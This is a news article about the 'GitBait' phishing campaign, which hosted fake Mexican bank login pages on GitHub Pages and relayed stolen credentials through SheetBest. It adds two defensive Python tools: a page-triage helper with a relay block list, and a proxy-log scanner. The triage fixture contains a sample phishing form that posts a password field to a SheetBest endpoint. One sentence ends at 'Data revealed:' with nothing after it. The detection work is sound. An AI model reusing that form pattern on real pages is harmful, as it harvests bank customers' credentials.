
Serverless Phishing Kit on GitHub Aims at Mexican Banks

A sophisticated phishing operation has emerged, targeting the banking credentials of customers at various Mexican financial institutions. Notably, this campaign, named "GitBait," has carried out its deceptive strategies without any dedicated server infrastructure. Instead, it operates stealthily within trusted cloud platforms, complicating efforts to detect and disrupt its activities.

According to a recent analysis released by Group-IB, GitBait has engaged in phishing attacks against no fewer than 12 financial institutions across Mexico over the past three years. The campaign bypasses traditional detection methods by hosting counterfeit banking pages on GitHub Pages. Simultaneously, it channels stolen login information through SheetBest, a legitimate online service that directs data straight into Google Sheets. This unconventional approach leaves almost no attacker-owned infrastructure for defenders to take down, posing a unique challenge for cybersecurity experts.

Group-IB’s investigation revealed that more than 100 domains hosted on GitHub were linked to the GitBait scheme, each containing multiple phishing pages. The cybersecurity firm took proactive measures by reporting all identified domains to GitHub, underscoring the scale of this operation.

The Mechanics of a Serverless Operation

At the core of this sophisticated phishing scheme is a modular phishing kit equipped with a user-friendly desktop and mobile operator panel. This setup enables attackers to select their target bank and effortlessly generate a counterfeit webpage that mimics the institution’s branding.

Each GitHub repository associated with GitBait contained mirrored versions of the phishing pages. This redundancy means that even if a particular page were to be taken down, it could be swiftly redeployed by the attackers. Victims often find themselves landing on pages that clone their bank’s branding, leading them into a trap where they are asked for sensitive information such as usernames, customer IDs, passwords, and card details. A cleverly designed script captures these entries and transmits them to SheetBest, after which a counterfeit verification screen is displayed to maintain an illusion of legitimacy and build user trust.

While Group-IB could not definitively ascertain how victims were initially entrapped, investigative evidence suggests that direct messaging was a likely method. The phishing pages were meticulously crafted with Open Graph tags, enabling them to render a convincing bank-branded preview card when shared via platforms like WhatsApp, Telegram, or SMS. To further evade detection, a noindex tag was employed, effectively removing these pages from search engine results.

Delving deeper into the operation, commit records from one of the GitHub repositories highlighted ongoing and active maintenance of the phishing structure. Data revealed:

Additionally, the phishing pages utilized obfuscated JavaScript sourced from randomized paths. This tactic allows operators to rotate their payloads without making adjustments to the visible page structure, thereby complicating the efforts of static analysis tools employed by cybersecurity teams.
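The indicators described in the two preceding paragraphs (bank-branded Open Graph preview tags, a noindex directive, a credential form that posts to a third-party relay, and scripts loaded from randomized paths) can be checked mechanically once an analyst has the HTML of a suspect page. The following Python triage helper is an added example, not code from the Group-IB report or from the GitBait kit itself. The relay hostname, the brand name, the page host and the sample HTML are all constructed for the example, and the entropy threshold used to call a path "randomized" is the author's heuristic.

```python
"""Triage heuristics for a suspected brand-impersonation page (added example).

Takes HTML an analyst has already fetched and reports which of the
indicators described in the article are present. Nothing here touches
the network.
"""
from collections import Counter
from html.parser import HTMLParser
from math import log2
from urllib.parse import urlparse

# Assumption: hostnames of form-to-spreadsheet relay services worth flagging.
# The article names SheetBest; the exact API hostname is an assumption.
RELAY_HOSTS = {"api.sheetbest.com", "sheetbest.com"}


class PageInspector(HTMLParser):
    """Collects meta tags, form actions, script sources and password inputs."""

    def __init__(self):
        super().__init__()
        self.meta = {}
        self.form_actions = []
        self.script_srcs = []
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta":
            key = a.get("property") or a.get("name")
            if key:
                self.meta[key.lower()] = (a.get("content") or "").strip()
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1


def shannon_entropy(s):
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * log2(c / n) for c in counts.values())


def looks_randomized(path):
    """Heuristic: a path segment of 8+ chars mixing letters and digits with high entropy."""
    for seg in path.split("/"):
        if len(seg) >= 8 and any(c.isalpha() for c in seg) and any(c.isdigit() for c in seg):
            if shannon_entropy(seg) >= 3.0:
                return True
    return False


def triage_page(html, brand_keywords, page_host):
    """Return the set of indicators found and a simple count as the score."""
    p = PageInspector()
    p.feed(html)
    findings = set()
    og_text = " ".join(v for k, v in p.meta.items() if k.startswith("og:")).lower()
    if any(b.lower() in og_text for b in brand_keywords):
        findings.add("og_tags_use_brand")       # preview card impersonates the brand
    if "noindex" in p.meta.get("robots", "").lower():
        findings.add("noindex")                 # hidden from search engines
    for action in p.form_actions:
        host = urlparse(action).netloc.lower()
        if host and host != page_host.lower():
            findings.add("form_posts_offsite")  # credentials leave the page's own origin
            if host in RELAY_HOSTS:
                findings.add("form_posts_to_relay")
    if p.password_inputs:
        findings.add("password_field")
    if any(looks_randomized(urlparse(src).path) for src in p.script_srcs):
        findings.add("randomized_script_path")  # rotating payload location
    return {"findings": sorted(findings), "score": len(findings),
            "meta": p.meta, "form_actions": p.form_actions}


# Constructed sample: what a GitBait-style page might look like (not a real capture).
SUSPECT_HTML = """<!doctype html><html><head>
<meta property="og:title" content="ExampleBank - Banca en Linea">
<meta property="og:image" content="https://example-bank-login.github.io/img/logo.png">
<meta name="robots" content="noindex, nofollow">
<script src="/assets/a8f3k2q9z1x7/app.js"></script>
</head><body>
<form action="https://api.sheetbest.com/sheets/PLACEHOLDER-SHEET-ID" method="post">
<input name="user"><input type="password" name="pass"></form></body></html>"""

# Constructed sample: a legitimate login page for comparison.
BENIGN_HTML = """<html><head>
<meta property="og:title" content="ExampleBank">
<script src="/js/main.js"></script></head><body>
<form action="https://www.examplebank.example/login" method="post">
<input type="password" name="pass"></form></body></html>"""

if __name__ == "__main__":
    print(triage_page(SUSPECT_HTML, ["ExampleBank"], "example-bank-login.github.io"))
    print(triage_page(BENIGN_HTML, ["ExampleBank"], "www.examplebank.example"))
```

Brand use in Open Graph tags is not an indicator on its own (the bank's real pages carry it too); the point of the score is the combination of brand-branded preview, noindex, an off-site credential form and rotating script paths on a host the bank does not control.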

Navigating Beyond Conventional Blocklists

In framing GitBait’s strategies, Group-IB emphasized a significant trend among cybercriminals—an inclination towards leveraging everyday cloud services and readily available phishing kits as opposed to developing custom malware and self-hosted servers. This shift resonates with the rising prominence of phishing-as-a-service platforms that have surfaced in recent years.

Given that the operation primarily relied on seemingly reputable domains, Group-IB cautioned that traditional blocklists detailing known malicious sites may offer little in the way of protection. This reality presents a considerable challenge for financial institutions looking to safeguard their customers.

Consequently, Group-IB has urged banks and financial entities to remain vigilant in monitoring GitHub for instances of brand misuse and to investigate any unexpected traffic to services like SheetBest. They recommend implementing behavioral detection methods, alongside robust measures such as multi-factor authentication (MFA) and transaction alerts, to mitigate the risk posed by such advanced phishing operations.
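The behavioral monitoring recommended above can be illustrated with a small log scan: flag requests to GitHub Pages hosts outside an allowlist, flag any contact with a form-to-spreadsheet relay, and raise the severity when one client visits an unlisted GitHub Pages host and then POSTs to the relay within a few minutes. This Python script is an added example, not tooling from Group-IB or the article. The log format, the relay hostname, the allowlisted GitHub Pages host and every log line are constructed for the example.

```python
"""Behavioral scan of web proxy logs for a GitBait-style sequence (added example).

Constructed log format: "<ISO timestamp> <client ip> <METHOD> <url> <status>".
"""
import re
from datetime import datetime
from urllib.parse import urlparse

RELAY_HOSTS = {"api.sheetbest.com"}                 # assumption: relay API hostname
ALLOWED_GITHUB_PAGES = {"docs.examplebank.github.io"}  # constructed allowlist

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def parse_line(line):
    """Parse one constructed-format log line; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # fromisoformat() accepts a trailing "Z" only on Python 3.11+, so normalise it.
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def make_alert(rec, reason, severity):
    return {"ts": rec["ts"].isoformat(), "src": rec["src"], "url": rec["url"],
            "reason": reason, "severity": severity}


def scan(lines, window_seconds=300):
    """Return alerts for unlisted GitHub Pages hosts, relay contact and the
    visit-then-POST sequence within window_seconds for the same client."""
    alerts = []
    last_unlisted_pages = {}  # client ip -> time of its latest unlisted github.io request
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host = (urlparse(rec["url"]).hostname or "").lower()
        if host.endswith(".github.io") and host not in ALLOWED_GITHUB_PAGES:
            alerts.append(make_alert(rec, "unlisted_github_pages", "medium"))
            last_unlisted_pages[rec["src"]] = rec["ts"]
        if host in RELAY_HOSTS:
            if rec["method"] == "POST":
                alerts.append(make_alert(rec, "relay_post", "high"))
                prev = last_unlisted_pages.get(rec["src"])
                if prev is not None and (rec["ts"] - prev).total_seconds() <= window_seconds:
                    alerts.append(make_alert(rec, "github_pages_then_relay_post", "critical"))
            else:
                alerts.append(make_alert(rec, "relay_contact", "low"))
    return alerts


# Constructed sample log lines (not a real capture).
SAMPLE_LOG = """\
2024-05-02T10:15:01Z 10.20.0.14 GET https://www.examplebank.example/login 200
2024-05-02T10:15:07Z 10.20.0.14 GET https://pages-examplebank-secure.github.io/acceso/ 200
2024-05-02T10:15:33Z 10.20.0.14 POST https://api.sheetbest.com/sheets/PLACEHOLDER-SHEET-ID 200
2024-05-02T10:16:02Z 10.20.0.21 GET https://docs.examplebank.github.io/ 200
2024-05-02T10:16:40Z 10.20.0.33 GET https://api.sheetbest.com/sheets/PLACEHOLDER-SHEET-ID 200
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(a["severity"].upper(), a["src"], a["reason"], a["url"])
```

The sequence rule is what turns two individually noisy signals into an actionable one: GitHub Pages traffic and spreadsheet relays both have legitimate uses, but a single client hitting an unlisted github.io host and then POSTing to a relay in short order matches the credential path the article describes.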

As the digital landscape continues to evolve, the emergence of campaigns like GitBait underscores the persistent threats that financial institutions and their customers face, necessitating dynamic responses and innovative cybersecurity strategies.
